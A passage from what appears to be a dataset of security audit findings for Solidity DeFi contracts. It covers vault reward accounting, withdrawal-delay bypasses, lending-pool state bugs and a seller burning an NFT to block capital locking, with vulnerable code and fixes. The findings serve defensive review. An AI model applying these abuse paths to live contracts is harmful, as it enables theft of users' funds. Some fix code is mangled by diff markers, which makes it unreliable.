userDeposit\\n : pairTokenReceived;\\n// Remove the line below\\n ohmMinted // Remove the line below\\n= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived // Remove the line below\\n ohmMinted : 0;\\n```\\n",It will make the calculation involving ohmMinted incorrect.,```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n +SingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current time,medium,"SingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current time\\n```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n\\nThe line is needed to see is this `uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime`. 
In case if `rewardToken.lastRewardTime > block.timestamp` than function will revert and ddos functions that use it.\\n```\\n function addInternalRewardToken(\\n address token_,\\n uint256 rewardsPerSecond_,\\n uint256 startTimestamp_\\n ) external onlyRole(""liquidityvault_admin"") {\\n InternalRewardToken memory newInternalRewardToken = InternalRewardToken({\\n token: token_,\\n decimalsAdjustment: 10**ERC20(token_).decimals(),\\n rewardsPerSecond: rewardsPerSecond_,\\n lastRewardTime: block.timestamp > startTimestamp_ ? block.timestamp : startTimestamp_,\\n accumulatedRewardsPerShare: 0\\n });\\n\\n\\n internalRewardTokens.push(newInternalRewardToken);\\n }\\n```\\n\\nIn case if `startTimestamp_` is in the future, then it will be set and cause that problem. lastRewardTime: block.timestamp > `startTimestamp_` ? block.timestamp : `startTimestamp_`.\\nNow till, `startTimestamp_` time, `_accumulateInternalRewards` will not work, so vault will be stopped. And of course, admin can remove that token and everything will be fine. 
That's why i think this is medium.",Skip token if it's `lastRewardTime` is in future.,SingleSidedLiquidityVault will be blocked,```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n +claimFees may cause some external rewards to be locked in the contract,medium,"claimFees will update rewardToken.lastBalance so that if there are unaccrued reward tokens in the contract, users will not be able to claim them.\\n_accumulateExternalRewards takes the difference between the contract's reward token balance and lastBalance as the reward. 
and the accumulated reward tokens are updated by _updateExternalRewardState.\\n```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n\\nauraPool.rewardsPool.getReward can be called by anyone to send the reward tokens to the contract\\n```\\n function getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n }\\n```\\n\\nHowever, in claimFees, the rewardToken.lastBalance will be updated to the current contract balance after 
the admin has claimed the fees.\\n```\\n function claimFees() external onlyRole(""liquidityvault_admin"") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nConsider the following scenario.\\nStart with rewardToken.lastBalance = 200.\\nAfter some time, the rewardToken in aura is increased by 100.\\nSomeone calls getReward to claim the reward tokens to the contract, and the 100 reward tokens increased have not yet been accumulated via _accumulateExternalRewards and _updateExternalRewardState.\\nThe admin calls claimFees to update rewardToken.lastBalance to 290(10 as fees).\\nUsers call claimRewards and receives 0 reward tokens. 
90 reward tokens will be locked in the contract","Use _accumulateExternalRewards and _updateExternalRewardState in claimFees to accrue rewards.\\n```\\n function claimFees() external onlyRole(""liquidityvault_admin"") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n// Add the line below\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n// Add the line below\\n _updateExternalRewardState(i, accumulatedExternalRewards[i]);\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n }\\n```\\n",It will cause some external rewards to be locked in the contract,"```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < 
rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n" +Protection sellers can bypass withdrawal delay mechanism and avoid losing funds when loans are defaulted by creating withdrawal request in each cycle,high,"To prevent protection sellers from withdrawing fund immediately when protected lending pools are defaults, there is withdrawal delay mechanism, but it's possible to bypass it by creating withdraw request in each cycle by doing so user can withdraw in each cycle's open state. 
there is no penalty for users when they do this or there is no check to avoid this.\\nThis is `_requestWithdrawal()` code:\\n```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n\\nAs you can see it doesn't keep track of user current withdrawal requests and user can request withdrawal for all of his balance in each cycle and by doing so user can set `withdrawalCycleDetails[Each Cycle][User]` to user's sToken balance. 
and whenever user wants to withdraw he only need to wait until the end of the current cycle while he should have waited until next cycle end.","To avoid this code should keep track of user balance that is not in withdraw delay and user balance that are requested for withdraw. and to prevent users from requesting withdrawing and not doing it protocol should have some penalties for withdrawals, for example the waiting withdraw balance shouldn't get reward in waiting duration.",protection sellers can request withdraw in each cycle for their full sToken balance and code would allow them to withdraw in each cycle end time because code doesn't track how much of the balance of users is requested for withdrawals in the past.,"```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += 
(_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n" +Lending pool state transition will be broken when pool is expired in late state,high,"Lending pool state transition will be broken when pool is expired in late state\\n```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n\\nAs you can see, pool is expired if time of credit line has ended or loan is fully paid.\\nState transition for lending pool is done inside `DefaultStateManager._assessState` function. This function is responsible to lock capital, when state is late and unlock it when it's changed from late to active again.\\nBecause the first state that is checked is `expired` there can be few problems.\\nFirst problem. Suppose that lending pool is in late state. So capital is locked. There are 2 options now: payment was done, so pool becomes active and capital unlocked, payment was not done then pool has defaulted. But in case when state is late, and lending pool expired or loan is fully repaid(so it's also becomes expired), then capital will not be unlocked as there is no such transition Late -> Expired. The state will be changed to Expired and no more actions will be done. 
Also in this case it's not possible to detect if lending pool expired because of time or because no payment was done.\\nSecond problem. Lending pool is in active state. Last payment should be done some time before `_creditLine.termEndTime()`. Payment was not done, which means that state should be changed to Late and capital should be locked, but state was checked when loan has ended, so it became Expired and again there is no such transition that can detect that capital should be locked in this case. The state will be changed to Expired and no more actions will be done.","These are tricky cases, think about transition for lending pool in such cases.","Depending on situation, capital can be locked forever or protection buyers will not be compensated.","```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n" +Existing buyer who has been regularly renewing protection will be denied renewal even when she is well within the renewal grace period,high,"Existing buyers have an opportunity to renew their protection within grace period. 
If lending state update happens from `Active` to `LateWithinGracePeriod` just 1 second after a buyer's protection expires, protocol denies buyer an opportunity even when she is well within the grace period.\\nSince defaults are not sudden and an `Active` loan first transitions into `LateWithinGracePeriod`, it is unfair to deny an existing buyer an opportunity to renew (its alright if a new protection buyer is DOSed). This is especially so because a late loan can become `active` again in future (or move to `default`, but both possibilities exist at this stage).\\nAll previous protection payments are a total loss for a buyer when she is denied a legitimate renewal request at the first sign of danger.\\n`renewProtection` first calls `verifyBuyerCanRenewProtection` that checks if the user requesting renewal holds same NFT id on same lending pool address & that the current request is within grace period defined by protocol.\\nOnce successfully verified, `renewProtection` calls `_verifyAndCreateProtection` to renew protection. 
This is the same function that gets called when a new protection is created.\\nNotice that this function calls `_verifyLendingPoolIsActive` as part of its verification before creating new protection - this check denies protection on loans that are in `LateWithinGracePeriod` or `Late` phase (see snippet below).\\n```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n","When a user is calling `renewProtection`, a different implementation of `verifyLendingPoolIsActive` is needed that allows a user to renew even when lending pool status is `LateWithinGracePeriod` or `Late`.\\nRecommend using `verifyLendingPoolIsActiveForRenewal` function in renewal flow as shown below\\n```\\n function verifyLendingPoolIsActiveForRenewal(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n if (poolStatus == LendingPoolStatus.NotSupported) {\\n revert IProtectionPool.LendingPoolNotSupported(_lendingPoolAddress);\\n }\\n //------ audit - this section needs to be commented-----//\\n //if (\\n // poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n // poolStatus == LendingPoolStatus.Late\\n //) {\\n // revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n //}\\n // ---------------------------------------------------------//\\n\\n if (poolStatus == 
LendingPoolStatus.Expired) {\\n revert IProtectionPool.LendingPoolExpired(_lendingPoolAddress);\\n }\\n\\n if (poolStatus == LendingPoolStatus.Defaulted) {\\n revert IProtectionPool.LendingPoolDefaulted(_lendingPoolAddress);\\n }\\n }\\n```\\n","User who has been regularly renewing protection and paying premium to protect against a future loss event will be denied that very protection when she most needs it.\\nIf existing user is denied renewal, she can never get back in (unless the lending pool becomes active again). All her previous payments were a total loss for her.","```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n" +Malicious seller forced break lockCapital(),high,"Malicious burn nft causes failure to lockCapital() ,seller steady earn PremiumAmount, buyer will be lost compensation\\nWhen the status of the lendingPool changes from Active to Late, the protocol will call ProtectionPool.lockCapital() to lock amount lockCapital() will loop through the active protections to calculate the `lockedAmount`. 
The code is as follows:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n\\nThe important thing inside is to calculate the _remainingPrincipal by `referenceLendingPools.calculateRemainingPrincipal()`\\n```\\n function calculateRemainingPrincipal(\\n address _lendingPoolAddress,\\n address _lender,\\n uint256 _nftLpTokenId\\n ) public view override returns (uint256 _principalRemaining) {\\n// rest of code\\n\\n if (_poolTokens.ownerOf(_nftLpTokenId) == _lender) { //<------------call ownerOf()\\n IPoolTokens.TokenInfo memory _tokenInfo = _poolTokens.getTokenInfo(\\n _nftLpTokenId\\n );\\n\\n// rest of code.\\n if (\\n _tokenInfo.pool == _lendingPoolAddress &&\\n _isJuniorTrancheId(_tokenInfo.tranche)\\n ) {\\n _principalRemaining =\\n _tokenInfo.principalAmount -\\n _tokenInfo.principalRedeemed;\\n }\\n }\\n }\\n```\\n\\nGoldfinchAdapter.calculateRemainingPrincipal() The current implementation will first determine if the ownerOf the NFTID is _lender\\nThere is a potential problem here, if the NFTID has been burned, the ownerOf() will be directly revert, which will lead to calculateRemainingPrincipal() revert,and lockCapital() revert and can't change status from active to late\\nLet's see whether Goldfinch's implementation supports burn(NFTID), and whether ownerOf(NFTID) will revert\\nPoolTokens has burn() method , if principalRedeemed==principalAmount you can burn it\\n```\\ncontract PoolTokens is IPoolTokens, 
ERC721PresetMinterPauserAutoIdUpgradeSafe, HasAdmin, IERC2981 {\\n// rest of code..\\n function burn(uint256 tokenId) external virtual override whenNotPaused {\\n TokenInfo memory token = _getTokenInfo(tokenId);\\n bool canBurn = _isApprovedOrOwner(_msgSender(), tokenId);\\n bool fromTokenPool = _validPool(_msgSender()) && token.pool == _msgSender();\\n address owner = ownerOf(tokenId);\\n require(canBurn || fromTokenPool, ""ERC721Burnable: caller cannot burn this token"");\\n require(token.principalRedeemed == token.principalAmount, ""Can only burn fully redeemed tokens"");\\n _destroyAndBurn(tokenId);\\n emit TokenBurned(owner, token.pool, tokenId);\\n }\\n```\\n\\n2.ownerOf() if nftid don't exists will revert with message ""ERC721: owner query for nonexistent token""\\n```\\ncontract ERC721UpgradeSafe is\\n Initializable,\\n ContextUpgradeSafe,\\n ERC165UpgradeSafe,\\n IERC721,\\n IERC721Metadata,\\n IERC721Enumerable\\n{\\n// rest of code\\n function ownerOf(uint256 tokenId) public view override returns (address) {\\n return _tokenOwners.get(tokenId, ""ERC721: owner query for nonexistent token"");\\n }\\n```\\n\\nIf it can't changes to late, Won't lock the fund, seller steady earn PremiumAmount\\nSo there are two risks\\nnormal buyer gives NFTID to burn(), he does not know that it will affect all protection of the lendingPool\\nMalicious seller can buy a protection first, then burn it, so as to force all protection of the lendingPool to expire and get the PremiumAmount maliciously. 
buyer unable to obtain compensation\\nSuggested try catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the owner","try catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the owner",buyer will be lost compensation,"```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n" +function lockCapital() doesn't filter the expired protections first and code may lock more funds than required and expired defaulted protections may funded,medium,"when a lending loan defaults, then function `lockCapital()` get called in the ProtectionPool to lock required funds for the protections bought for that lending pool, but code doesn't filter the expired protections first and they may be expired protection in the active protection array that are not excluded and this would cause code to lock more fund and pay fund for expired defaulted protections and protection sellers would lose more funds.\\nThis `lockCapital()` code:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n 
_lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? 
_protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n\\nAs you can see code loops through active protection array for that lending pool and calculates required locked amount but it doesn't call `_accruePremiumAndExpireProtections()` to make sure active protections doesn't include any expired protections. if function `_accruePremiumAndExpireProtections()` doesn't get called for a while, then there would be possible that some of the protections are expired and they are still in the active protection array. This would cause code to calculated more locked amount and also pay fund for those expired defaulted protections too from protection sellers. 
(also when calculating the required token payment for the protection code doesn't check the expiration too in the other functions that are get called by the `lockCapital()`, the expire check doesn't exists in inner function too)",call `_accruePremiumAndExpireProtections()` for the defaulted pool to filter out the expired protections.,see summery,"```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. 
total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? _protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n" +"If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premium",medium,"If the unlocked capital in a pool falls below the minRequiredCapital, then protection can be bought for minimum premium\\nIn PremiumCalculator.calculatePremium, we see that if the risk factor ""cannot be calculated,"" it uses the minimum premium.\\n```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n 
